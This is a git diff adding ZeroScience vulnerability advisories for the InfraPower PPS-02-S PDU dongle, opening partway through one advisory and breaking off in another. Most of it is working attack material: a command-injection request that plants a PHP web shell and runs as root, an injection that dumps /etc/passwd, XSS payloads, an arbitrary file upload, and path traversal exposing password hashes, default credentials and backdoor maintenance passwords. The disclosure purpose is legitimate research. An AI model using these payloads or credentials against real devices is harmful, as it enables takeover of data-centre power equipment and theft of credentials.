"; +15: system("mount -t nfs -o nolock ".$_POST["ipaddr"].":".$_POST["nfsdir"]." /nfs"); +16: system("cp /nfs/".$_POST["fwname"]." /"); +17: echo "Flash erasing
"; +18: system("@flash_eraseall /dev/mtd0"); +19: system("cp /".$_POST["fwname"]." /dev/mtd0"); +20: echo "Upgrate done
"; +21: system("umount /nfs"); +22: echo "Reboot system
"; +23: system("reboot"); +24: ?> + +--------------------------------------------------------------------- + + +IPSettings.php: +--------------- + + +83: $IP_setting = ereg_ip($_POST['IP']); +84: $Netmask_setting = ereg_ip($_POST['Netmask']); +85: $Gateway_setting = ereg_ip($_POST['Gateway']); +... +... +110: $fout = fopen("/mnt/mtd/net_conf", "w"); +111: if($fout){ +112: $output = substr($output, 0, -1); +113: fprintf($fout, "%s", $output); +114: //echo $change_ip.'b'; +115: if($change_ip === '1'){ +116: $str = ''; +117: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str); +118: // echo $str."\n"; +119: } +120: if($change_gw === '1'){ +121: $str = ''; +122: exec('ip route del default', $str); +123: exec('route add default gw '.$Gateway_setting, $str); +124: // echo $str[0]."a\n"; +125: } +126: } +127: fclose($fout); +... +... +164: function ereg_ip($ipstring){ +165: $ipstring=trim($ipstring); //移除前後空白 +166: //格式錯誤 +167: if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0; +168: //內容檢查 +169: $ip_segment =split("\.",$ipstring); //注意一定要加 "\",否則會分不開。 +170: foreach($ip_segment as $k =>$v){ +171: if($v >255){ +171: return 0; +172: } +173: $ip_segment[$k]=(int)$ip_segment[$k]; //消除ip中的0,ex:1.020.003.004 =>1.20.3.4 +174: } //end foreach +175: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //將字串$ip處理 +176: return $ipstring; +177: } + +--------------------------------------------------------------------- + + +Login.php: +---------- + + +126: $UserName = getConf("/mnt/mtd/web_conf", "UserName"); +127: $Password = getConf("/mnt/mtd/web_conf", "Password"); +128: +129: //echo 'z'.$_POST['ID_User'].';'.$UserName.' Pwd:'.$_POST['ID_Password'].';'.$Password; +130: if($_POST['ID_User'] === $UserName && $_POST['ID_Password'] === $Password){ +... +... +140: $_SESSION['Login'] = $_POST['ID_User']; +141: +142: //Login +143: $loginTime = date("Y-m-d,H:i:s.0,P"); +144: $remoteIP = $_SERVER['REMOTE_ADDR']; +145: //----------SNMP checking ---Ed 20130307------------------------< +146: $SNMPEnable = getConf("/mnt/mtd/snmp_conf", "enable"); +147: if ($SNMPEnable == "1") { +148: $TrapEnable = getConf("/mnt/mtd/snmp_conf", "trap"); +149: if ($TrapEnable == "v2Trap") { +150: $trapTo = getConf("/mnt/mtd/snmp_conf", "IP"); +151: shell_exec('/usr/bin/snmptrap -M /usr/share/snmp/mibs/ -c public -v 2c ' . $trapTo . ' \'\' InfraPower-MIB::webLogin InfraPower-MIB::objectDateTime s "' . $loginTime . '" InfraPower-MIB::userName s "' . $_POST['ID_User'] . '" InfraPower-MIB::webAccessIpAddress s "' . $remoteIP . '"'); +152: //echo "alert($res);"; +153: } +154: } + +--------------------------------------------------------------------- + + +Ntp.php: +-------- + + +36: + +--------------------------------------------------------------------- + + +production_test1.php: +--------------------- + + +4: if( isset($_POST['macAddress']) ) +5: { +6: shell_exec("echo ". $_POST['macAddress'] . " > /mnt/mtd/mac_addr"); +7: $mac = shell_exec("cat /mnt/mtd/mac_addr"); +8: /*$result = $fail; +9: echo $mac . ","; +10: echo $_POST['macAddress']; +11: if( !strcmp($mac,$_POST['macAddress']) ) +12: $result = $success; +13: echo "verify - " . $mac . " - " . $result;*/ +14: echo "verify - " . $mac; +15: +16: exit(); +17: } + +--------------------------------------------------------------------- + + +SNMP.php: +--------- + + +34: if($_POST["SNMPAgent"] === "Enable"){ +35: exec('kill -9 `ps | grep "snmpd -c /mnt/mtd/snmpd.conf" | cut -c 1-5`'); +36: setConf("/mnt/mtd/snmp_conf", "enable", "1"); +37: +38: if(!empty($_POST["CommuintyString"]) && !empty($_POST["CommuintyWrite"])) +39: { +40: exec("cp /etc/snmpd.conf /mnt/mtd/snmpd.conf"); +41: exec("sed -i s/public/".$_POST["CommuintyString"]."/g /mnt/mtd/snmpd.conf"); +42: setConf("/mnt/mtd/snmp_conf", "pCommunity", $_POST["CommuintyString"]); +43: setSnmpConf(1,$_POST["CommuintyString"]); +44: setSnmpConf(2,$_POST["CommuintyWrite"]); +45: $pCommunity = $_POST["CommuintyString"]; +46: } + +--------------------------------------------------------------------- + + +System.php: +----------- + + +86: if(!empty($_POST['ChangeTime']) == "1"){ +87: if(checkdate($_POST['month'], $_POST['day'], $_POST['year']) == 1){ +88: +89: //Ray modify +90: $datetime = date("mdHiY.s", mktime($_POST['hour']-1,$_POST['minute']-1,$_POST['second']-1,$_POST['month'],$_POST['day'],$_POST['year'])); +91: //$datetime = $_POST['month'].$_POST['day'].$_POST['hour'].$_POST['minute'].$_POST['year'].'.'.$_POST['second']; +92: +93: +94: if(isset($_POST['TimeZone'])){ +95: setTimeZone($_POST['TimeZone']); +96: $orgZone = $_POST['TimeZone']; +97: } +98: +99: exec('date '.$datetime); +100: exec('hwclock -w'); +101: exec('hwclock -w -f /dev/rtc1'); +... +... +180: if(isset($_POST['TimeServer'])){ +181: //$TimeServer = ereg_ip($_POST['TimeServer']); +182: if(!empty($_POST['TimeServer'])){ +183: $TimeServer = $_POST['TimeServer']; +184: +185: $returnStr = exec("/usr/bin/ntpclient -s -h ".$TimeServer . " -i 1"); +... +... +286: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str); +... +... +292: exec('route add default gw '.$Gateway_setting, $str); +... +... +336: function ereg_ip($ipstring){ +337: $ipstring=trim($ipstring); //移除前後空白 +338: //格式錯誤 +339: if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0; +340: //內容檢查 +341: $ip_segment =split("\.",$ipstring); //注意一定要加 "\",否則會分不開。 +342: foreach($ip_segment as $k =>$v){ +343: if($v >255){ +344: return 0; +345: } +346: $ip_segment[$k]=(int)$ip_segment[$k]; //消除ip中的0,ex:1.020.003.004 =>1.20.3.4 +347: } //end foreach +348: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //將字串$ip處理 +349: return $ipstring; +350: } + +--------------------------------------------------------------------- + + +UploadEXE.php: +-------------- + + +72: if(isset($_POST['hasFile'])){ +73: if ($_FILES['ExeFile']['error'] > 0){ +74: echo 'Error: ' . $_FILES['FW']['error']; +75: }else{ +76: echo 'File Name: ' . $_FILES['ExeFile']['name'].'
'; +... +... +80: move_uploaded_file($_FILES['ExeFile']['tmp_name'], '/ramdisk/'.$_FILES['ExeFile']['name']); +81: chmod("/ramdisk/".$_FILES['ExeFile']['name'], "0777"); +82: $fp = popen("\"/ramdisk/".$_FILES['ExeFile']['name']."\"", "r"); + +--------------------------------------------------------------------- +--------------------------------------------------------------------- +--------------------------------------------------------------------- + + +#1 +-- + +PoC Request: + +curl -i -s -k -X 'POST' \ + -H 'User-Agent: ZSL-Injectinator/3.1 (Unix)' -H 'Content-Type: application/x-www-form-urlencoded' \ + --data-binary $'SNMPAgent=Enable&CommuintyString=public|%65%63%68%6f%20%22%3c%3f%70%68%70%20%65%63%68%6f%20%73%79%73%74%65%6d%28%5c%24%5f%47%45%54%5b%27%63%27%5d%29%3b%20%3f%3e%22%20%3Etest251.php%26&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254' \ + 'https://192.168.0.17/SNMP.php?Menu=SMP' + +... + +curl -k https://192.168.0.17/test251.php?c=whoami;echo " at ";uname -a + +Response: + +root + at +Linux A320D 2.6.28 #866 PREEMPT Tue Apr 22 16:07:03 HKT 2014 armv5tel unknown + + +#2 +-- + +PoC Request: + +POST /production_test1.php HTTP/1.1 +Host: 192.168.0.17 +User-Agent: ZSL-Injectinator/3.1 (Unix) +Content-Type: application/x-www-form-urlencoded +Connection: close + +macAddress=ZE:RO:SC:IE:NC:E0;cat /etc/passwd + + +Response: + +HTTP/1.1 200 OK +X-Powered-By: PHP/5.3.9 +Content-type: text/html +Connection: close +Date: Fri, 17 Jan 2003 16:58:52 GMT +Server: lighttpd/1.4.30-devel-1321 +Content-Length: 751 + +verify - root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh +bin:x:1:1:bin:/bin:/bin/sh +daemon:x:2:2:daemon:/usr/sbin:/bin/sh +adm:x:3:4:adm:/adm:/bin/sh +lp:x:4:7:lp:/var/spool/lpd:/bin/sh +sync:x:5:0:sync:/bin:/bin/sync +shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh +operator:x:11:0:Operator:/var:/bin/sh +nobody:x:99:99:nobody:/home:/bin/sh +admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script +user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script +service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh +www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh +www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh diff --git a/platforms/php/webapps/40641.txt b/platforms/php/webapps/40641.txt new file mode 100755 index 000000000..ea56b173d --- /dev/null +++ b/platforms/php/webapps/40641.txt @@ -0,0 +1,235 @@ +InfraPower PPS-02-S Q213V1 Multiple XSS Vulnerabilities + + +Vendor: Austin Hughes Electronics Ltd. +Product web page: http://www.austin-hughes.com +Affected version: Q213V1 (Firmware: V2395S) +Fixed version: Q216V3 (Firmware: IPD-02-FW-v03) + +Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each +IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs. +Patented IP Dongle provides IP remote access to the PDUs by a true +network IP address chain. Only 1xIP dongle allows access to max. 16 +PDUs in daisy chain - which is a highly efficient cient application +for saving not only the IP remote accessories cost, but also the true +IP addresses required on the PDU management. + +Desc: InfraPower suffers from multiple stored and reflected XSS vulnerabilities +when input passed via several parameters to several scripts is not properly +sanitized before being returned to the user. This can be exploited to execute +arbitrary HTML and script code in a user's browser session in context of an affected +site. + +Tested on: Linux 2.6.28 (armv5tel) + lighttpd/1.4.30-devel-1321 + PHP/5.3.9 + SQLite/3.7.10 + + +Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5369 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5369.php + + +27.09.2016 + +-- + + +################################################################################# + +GET /SensorDetails.php?Menu=SST&DeviceID=C100"> HTTP/1.1 + +################################################################################# + +POST /FWUpgrade.php HTTP/1.1 +Host: 192.168.0.17 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary207OhXVwesC60pdh +Connection: close + +------WebKitFormBoundary207OhXVwesC60pdh +Content-Disposition: form-data; name="FW"; filename="somefile.php" +Content-Type: text/php + +t00t +------WebKitFormBoundary207OhXVwesC60pdh +Content-Disposition: form-data; name="upfile" + +somefile.php +------WebKitFormBoundary207OhXVwesC60pdh +Content-Disposition: form-data; name="ID_Page" + +Firmware.php?Menu=FRM +------WebKitFormBoundary207OhXVwesC60pdh-- + + +################################################################################# + +POST /SNMP.php?Menu=SMP HTTP/1.1 +Host: 192.168.0.17 + +SNMPAgent=Enable&CommuintyString=public&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254';alert(3)// + +################################################################################# + + +lqwrm@zslab:~# +lqwrm@zslab:~# ./scanmyphp -v -r -d infrapower -o scan_output.txt +------------------------------------------------- +PHP Source Code Security Scanner v0.2 +(c) Zero Science Lab - http://www.zeroscience.mk +Tue Sep 27 10:35:52 CEST 2016 +------------------------------------------------- + +Scanning recursively...Done. + +dball.php: + +Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST' +Line 45: Cross-Site Scripting (XSS) in 'echo' via '$Table' +Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST' +Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table' +Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST' +Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table' +Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST' +Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table' +Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST' +Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table' + + +doupgrate.php: + +Line 11: Cross-Site Scripting (XSS) in 'echo' via '$_POST' +Line 12: Cross-Site Scripting (XSS) in 'echo' via '$_POST' +Line 15: Command Injection in 'system' via '$_POST' +Line 16: Command Injection in 'system' via '$_POST' +Line 19: Command Injection in 'system' via '$_POST' + + +Firmware.php: + +Line 166: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER' + + +Function.php: + +Line 257: Header Injection in 'header' via '$_SERVER' +Line 267: Header Injection in 'header' via '$_SERVER' + + +FWUpgrade.php: + +Line 39: Cross-Site Scripting (XSS) in 'echo' via '$_FILES' +Line 43: Cross-Site Scripting (XSS) in 'echo' via '$_FILES' +Line 44: Cross-Site Scripting (XSS) in 'echo' via '$_FILES' +Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_FILES' +Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_FILES' + + +index.php: + +Line 2: Header Injection in 'header' via '$_SERVER' + + +IPSettings.php: + +Warning: ereg() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged. +Warning: split() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged. +Line 117: Command Injection in 'exec' via '$IP_setting' +Line 117: Command Injection in 'exec' via '$Netmask_setting' +Line 123: Command Injection in 'exec' via '$Gateway_setting' + + +ListFile.php: + +Line 12: PHP File Inclusion in 'fgets' via '$fp' + + +Login.php: + +Line 151: Command Injection in 'shell_exec' via '$_POST' + + +Ntp.php: + +Line 46: Command Injection in 'exec' via '$idx' + + +OutletDetails.php: + +Line 78: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' +Line 241: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' +Line 623: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' +Line 674: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' +Line 730: Cross-Site Scripting (XSS) in 'echo' via '$row' +Line 732: Cross-Site Scripting (XSS) in 'echo' via '$row' +Line 914: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' + + +PDUStatus.php: + +Line 625: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER' + + +production_test1.php: + +Line 6: Command Injection in 'shell_exec' via '$_POST' +Line 45: Command Injection in 'proc_open' via '$_ENV' + + +SensorDetails.php: + +Line 844: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' +Line 896: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' +Line 1233: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID' + + +SensorStatus.php: + +Line 695: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER' + + +SNMP.php: + +Line 41: Command Injection in 'exec' via '$_POST' + + +System.php: + +Line 54: Header Injection in 'header' via '$_SERVER' +Line 64: Header Injection in 'header' via '$_SERVER' +Line 99: Command Injection in 'exec' via '$datetime' +Line 99: Command Injection in 'exec' via '$datetime' +Line 99: Command Injection in 'exec' via '$datetime' +Line 99: Command Injection in 'exec' via '$datetime' +Line 99: Command Injection in 'exec' via '$datetime' +Line 99: Command Injection in 'exec' via '$datetime' +Line 185: Command Injection in 'exec' via '$TimeServer' +Line 286: Command Injection in 'exec' via '$IP_setting' +Line 286: Command Injection in 'exec' via '$Netmask_setting' +Line 292: Command Injection in 'exec' via '$Gateway_setting' + + +UploadEXE.php: + +Line 74: Cross-Site Scripting (XSS) in 'echo' via '$_FILES' +Line 76: Cross-Site Scripting (XSS) in 'echo' via '$_FILES' +Line 82: Command Injection in 'popen' via '$_FILES' +Line 96: PHP File Inclusion in 'fgets' via '$fp' +Line 96: PHP File Inclusion in 'fgets' via '$buffer' + + +WriteRequest.php: + +Line 96: Cross-Site Scripting (XSS) in 'echo' via '$_POST' +Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page' +Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page' + + +----------------------------------------------------- +Scan finished. Check results in scan_output.txt file. + +lqwrm@zslab:~# diff --git a/platforms/php/webapps/40642.txt b/platforms/php/webapps/40642.txt new file mode 100755 index 000000000..ae55b5516 --- /dev/null +++ b/platforms/php/webapps/40642.txt @@ -0,0 +1,389 @@ +InfraPower PPS-02-S Q213V1 Local File Disclosure Vulnerability + + +Vendor: Austin Hughes Electronics Ltd. +Product web page: http://www.austin-hughes.com +Affected version: Q213V1 (Firmware: V2395S) +Fixed version: Q216V3 (Firmware: IPD-02-FW-v03) + +Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each +IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs. +Patented IP Dongle provides IP remote access to the PDUs by a true +network IP address chain. Only 1xIP dongle allows access to max. 16 +PDUs in daisy chain - which is a highly efficient cient application +for saving not only the IP remote accessories cost, but also the true +IP addresses required on the PDU management. + +Desc: InfraPower suffers from a file disclosure vulnerability when +input passed thru the 'file' parameter to 'ListFile.php' script is +not properly verified before being used to read files. This can +be exploited to disclose contents of files from local resources. + +------------------------------------------------------------------- +ListFile.php: +------------- + +8: if(isset($_GET['file'])){ +9: $handle = $_GET['file']; +10: $fp = fopen('/ramdisk/'.$handle, 'r'); +11: while(!feof($fp)){ +12: $tmp=fgets($fp,2000); +13: $tmp = str_replace("\n","
",$tmp); +14: echo $tmp; +15: } +16: fclose($fp); +17: } + +------------------------------------------------------------------- + + +Tested on: Linux 2.6.28 (armv5tel) + lighttpd/1.4.30-devel-1321 + PHP/5.3.9 + SQLite/3.7.10 + + +Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5370 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5370.php + + +27.09.2016 + +-- + + +http://192.168.0.17/ListFile.php?file=../../../../../../../etc/passwd + +root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh +bin:x:1:1:bin:/bin:/bin/sh +daemon:x:2:2:daemon:/usr/sbin:/bin/sh +adm:x:3:4:adm:/adm:/bin/sh +lp:x:4:7:lp:/var/spool/lpd:/bin/sh +sync:x:5:0:sync:/bin:/bin/sync +shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh +operator:x:11:0:Operator:/var:/bin/sh +nobody:x:99:99:nobody:/home:/bin/sh +admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script +user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script +service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh +www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh +www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh + + +http://192.168.0.17/ListFile.php?file=../../../../../../../etc/web_conf + +LoginAuth 1 +UserName 00000000 +Password 00000000 + + +http://192.168.0.17/ListFile.php?file=../../../../../../../mnt/mtd/password_conf + +dmin 999999 +manager 666666 +user 111111 + + +http://192.168.0.17/ListFile.php?file=../../../../../../../sbin/maintenance_shell.sh + +#!/bin/sh +echo -n "Please enter maintenance password:" +read -s pass +InfraType=`cat /mnt/mtd/main_conf | grep "InfraType" | cut -d " " -f 2` +if [ "$InfraType" == "1" ]; then +if [ "$pass" != "InfraSolution" ]; then +echo "Invalid maintenance password!" +exit 0 +fi +else +if [ "$InfraType" == "2" ]; then +if [ "$pass" != "InfraGuard" ]; then +echo "Invalid maintenance password!" +exit 0 +fi +else +if [ "$InfraType" == "3" ]; then +if [ "$pass" != "InfraPower" ]; then +echo "Invalid maintenance password!" +exit 0 +fi +else +if [ "$InfraType" == "4" ]; then +if [ "$pass" != "InfraCool" ]; then +echo "Invalid maintenance password!" +exit 0 +fi +else +#---emergency recovery mode +echo "DEBUG su mode started!" +su +fi +fi +fi +fi + +# create menu +echo "" +echo "***********************************************" +echo "* Maintenance Menu *" +echo "***********************************************" +echo "(1) View(vi) /mnt/mtd/main_conf " +echo "(2) View /mnt/mtd/snmp_conf " +echo "(3) View /mnt/mtd/net_conf " +echo "(4) View /mnt/mtd/web_conf " +echo "(5) Enable auto patching(boot.sh) on bootup " +echo "(6) Disable auto patching(boot.sh) on bootup " +echo "(7) Clear all patching (/mnt/mtd/patch/) " +echo "(8) Update /www/patch/ to /mnt/mtd/patch/ " +echo "(9) Process Monitoring " +echo "(A) Patch SNMP " +echo "(B) Restore Configuration " +echo "(P) Restore INI, POL profiles " +echo "(E) Execute command line " +echo "(M) View meminfo " +echo "(X) Terminal console mode " +echo "(R) Reboot " +echo "(?) This menu " +echo "(Q) Exit " +echo "***********************************************" +while true; do +echo -n "Input Maintenance menu item number(? for help):" +read y +case $y in +"?") +echo "" +echo "***********************************************" +echo "* Maintenance Menu *" +echo "***********************************************" +echo "(1) View(vi) /mnt/mtd/main_conf " +echo "(2) View /mnt/mtd/snmp_conf " +echo "(3) View /mnt/mtd/net_conf " +echo "(4) View /mnt/mtd/web_conf " +echo "(5) Enable auto patching(boot.sh) on bootup " +echo "(6) Disable auto patching(boot.sh) on bootup " +echo "(7) Clear all patching (/mnt/mtd/patch/) " +echo "(8) Update /www/patch/ to /mnt/mtd/patch/ " +echo "(9) Process Monitoring " +echo "(A) Patch SNMP " +echo "(B) Restore Configuration " +echo "(P) Restore INI, POL profiles " +echo "(E) Execute command line " +echo "(M) View meminfo " +echo "(X) Terminal console mode " +echo "(R) Reboot " +echo "(?) This menu " +echo "(Q) Exit " +echo "***********************************************" +;; +"1") +echo "****/mnt/mtd/main_conf******************************" +vi /mnt/mtd/main_conf +echo "****************************************************" +;; +"2") +echo "****/mnt/mtd/snmp_conf******************************" +cat /mnt/mtd/snmp_conf +echo "****************************************************" +;; +"3") +echo "****/mnt/mtd/net_conf*******************************" +cat /mnt/mtd/net_conf +echo "****************************************************" +;; +"4") +echo "****/mnt/mtd/web_conf*******************************" +cat /mnt/mtd/web_conf +echo "****************************************************" +;; +"5") +echo "(5) Enable auto patching(boot.sh) on bootup " +echo -n "Are you sure to continue? [y/n]:" +read ans5 +if [ "$ans5" == "y" ]; then +if [ -f "/mnt/mtd/patch/mnt/mtd/boot.sh" ]; then +echo -n "Patching boot.sh ..." +cp /mnt/mtd/patch/mnt/mtd/boot.sh /mnt/mtd/boot.sh +chmod 777 /mnt/mtd/boot.sh +if [ -f "/mnt/mtd/boot.sh" ]; then +echo "...done" +else +echo "...fail" +fi +else +echo "file not exist: /mnt/mtd/patch/boot.sh" +fi +fi +;; +"6") +echo "(6) Disable auto patching(boot.sh) on bootup " +echo -n "Are you sure to continue? [y/n]:" +read ans6 +if [ "$ans6" == "y" ]; then +if [ -f "/mnt/mtd/boot.sh" ]; then +echo -n "Disabling boot.sh pacthing..." +rm /mnt/mtd/boot.sh +echo "...done" +else +echo "File not exist: /mnt/mtd/boot.sh" +fi +fi +;; +"7") +echo "(7) Clear /mnt/mtd/patch/ " +echo -n "Are you sure to continue? [y/n]:" +read ans7 +if [ "$ans7" == "y" ]; then +echo -n " Removing patch files (/mnt/mtd/patch/*)..." +rm -r /mnt/mtd/patch/* +if [ ! -f "/mnt/mtd/patch/" ]; then +echo "...done" +echo -n "Reboot to apply changes? [y/n]:" +read ans7r +if [ "$ans7r" == "y" ]; then +echo "Rebooting..." +reboot +fi + +else +echo "...fail" +fi +fi +;; +"8") +echo "(8) Update /www/patch/ to /mnt/mtd/patch/ " +echo -n "Are you sure to continue? [y/n]:" +read ans8 +if [ "$ans8" == "y" ]; then +if [ -f "/www/patch/patch_now.sh" ]; then +chmod 777 /www/patch/patch_now.sh +sh /www/patch/patch_now.sh +else +echo "file not exist: /www/patch/patch_now.sh" +fi +fi +;; +"9") +echo "****Process List*******************************" +ps +echo "***********************************************" +;; +"A") +echo "(A) Patch SNMP " +echo -n "Are you sure to continue? [y/n]:" +read ans8 +if [ "$ans8" == "y" ]; then +if [ -f "/www/patch/snmplink.sh" ]; then +sh /www/patch/snmplink.sh +if [ -f "/www/snmplink.log" ]; then +cat /www/snmplink.log +fi +echo "Patching SNMP and its modules...done" +else +echo "file not exist: /www/patch/snmplink.sh" +fi +fi +;; +"B") +echo "(B) Restore Box Configuration(box_conf) " +echo -n "Are you sure to continue? [y/n]:" +read ans8 +if [ "$ans8" == "y" ]; then +if [ -f "/etc/box_conf" ]; then +echo "Patching /mnt/mtd/box_conf..." +cp /etc/box_conf /mnt/mtd/box_conf +if [ -f "/mnt/mtd/box_conf" ]; then +echo "Patching /mnt/mtd/box_conf...done" +else +echo "Patching /mnt/mtd/box_conf...failed" +fi +else +echo "file not exist: /etc/box_conf" +fi +fi +;; +"P") +INFRA_VER=`cat /etc/infratype_conf | grep "InfraType" | cut -d " " -f 2 | sed -e 's/^[ \t]*//' | sed -e 's/[ /t]*$//' | cut -d " " -f1` +echo "(P) Restore INI, POL profiles for $INFRA_VER " +echo -n "Are you sure to continue? [y/n]:" +read ansP +if [ "$ansP" == "y" ]; then +if [ "$InfraType" == "1" ]; then +echo "Restoring INI, POL profiles for $INFRA_VER..." +if [ -f "/etc/MF2_ini_$INFRA_VER" ]; then +echo -n "Found /etc/MF2_ini_$INFRA_VER, Restoring..." +cp /etc/MF2_ini_$INFRA_VER /mnt/mtd/MF2_ini +echo "...done" +fi +if [ -f "/etc/MF2_pol_$INFRA_VER" ]; then +echo -n "Found /etc/MF2_pol_$INFRA_VER, Restoring..." +cp /etc/MF2_pol_$INFRA_VER /mnt/mtd/MF2_pol +echo "...done" +fi +if [ -f "/etc/PDU3_ini_$INFRA_VER" ]; then +echo -n "Found /etc/PDU3_ini_$INFRA_VER, Restoring..." +cp /etc/PDU3_ini_$INFRA_VER /mnt/mtd/PDU3_ini +echo "...done" +fi +if [ -f "/etc/PDU3_pol_$INFRA_VER" ]; then +echo -n "Found /etc/PDU3_pol_$INFRA_VER, Restoring..." +cp /etc/PDU3_pol_$INFRA_VER /mnt/mtd/PDU3_pol +echo "...done" +fi +if [ -f "/etc/FAN2_ini_$INFRA_VER" ]; then +echo -n "Found /etc/FAN2_ini_$INFRA_VER, Restoring..." +cp /etc/FAN2_ini_$INFRA_VER /mnt/mtd/FAN2_ini +echo "...done" +fi +if [ -f "/etc/FAN2_pol_$INFRA_VER" ]; then +echo -n "Found /etc/FAN2_pol_$INFRA_VER, Restoring..." +cp /etc/FAN2_pol_$INFRA_VER /mnt/mtd/FAN2_pol +echo "...done" +fi +if [ -f "/etc/HANDLE3_ini_$INFRA_VER" ]; then +echo -n "Found /etc/HANDLE3_ini_$INFRA_VER, Restoring..." +cp /etc/HANDLE3_ini_$INFRA_VER /mnt/mtd/HANDLE3_ini +echo "...done" +fi +if [ -f "/etc/HANDLE3_pol_$INFRA_VER" ]; then +echo -n "Found /etc/HANDLE3_pol_$INFRA_VER, Restoring..." +cp /etc/HANDLE3_pol_$INFRA_VER /mnt/mtd/HANDLE3_pol +echo "...done" +fi +fi +fi +;; +"E") +echo -n "Input command line:" +read cmd_line +$cmd_line +;; +"M") +if [ -f "/mnt/mtd/log_memCheck.txt" ]; then +cat /mnt/mtd/log_memCheck.txt +fi +;; +"R") +echo "(R) Reboot " +echo -n "Are you sure to continue? [y/n]:" +read ansR +if [ "$ansR" == "y" ]; then +echo "Rebooting..." +reboot +fi +;; +"X") +echo "su mode started!" +su +;; +"Q") +echo "Leaving maintenance mode........OK" +exit 0 +;; +esac +done diff --git a/platforms/php/webapps/40644.txt b/platforms/php/webapps/40644.txt new file mode 100755 index 000000000..c200cf1f2 --- /dev/null +++ b/platforms/php/webapps/40644.txt @@ -0,0 +1,54 @@ +InfraPower PPS-02-S Q213V1 Insecure Direct Object Reference Authorization Bypass + + +Vendor: Austin Hughes Electronics Ltd. +Product web page: http://www.austin-hughes.com +Affected version: Q213V1 (Firmware: V2395S) +Fixed version: Q216V3 (Firmware: IPD-02-FW-v03) + +Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each +IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs. +Patented IP Dongle provides IP remote access to the PDUs by a true +network IP address chain. Only 1xIP dongle allows access to max. 16 +PDUs in daisy chain - which is a highly efficient cient application +for saving not only the IP remote accessories cost, but also the true +IP addresses required on the PDU management. + +Desc: Insecure Direct Object References occur when an application +provides direct access to objects based on user-supplied input. As +a result of this vulnerability attackers can bypass authorization +and access resources and functionalities in the system directly, for +example APIs, files, upload utilities, device settings, etc. + +Tested on: Linux 2.6.28 (armv5tel) + lighttpd/1.4.30-devel-1321 + PHP/5.3.9 + SQLite/3.7.10 + + +Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5373 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5373.php + + +27.09.2016 + +-- + + +GET /ConnPort.php +GET /CSSSource.php +GET /dball.php +GET /doupgrate.php +GET /IPSettings.php +GET /ListFile.php +GET /Menu.php +GET /Ntp.php +GET 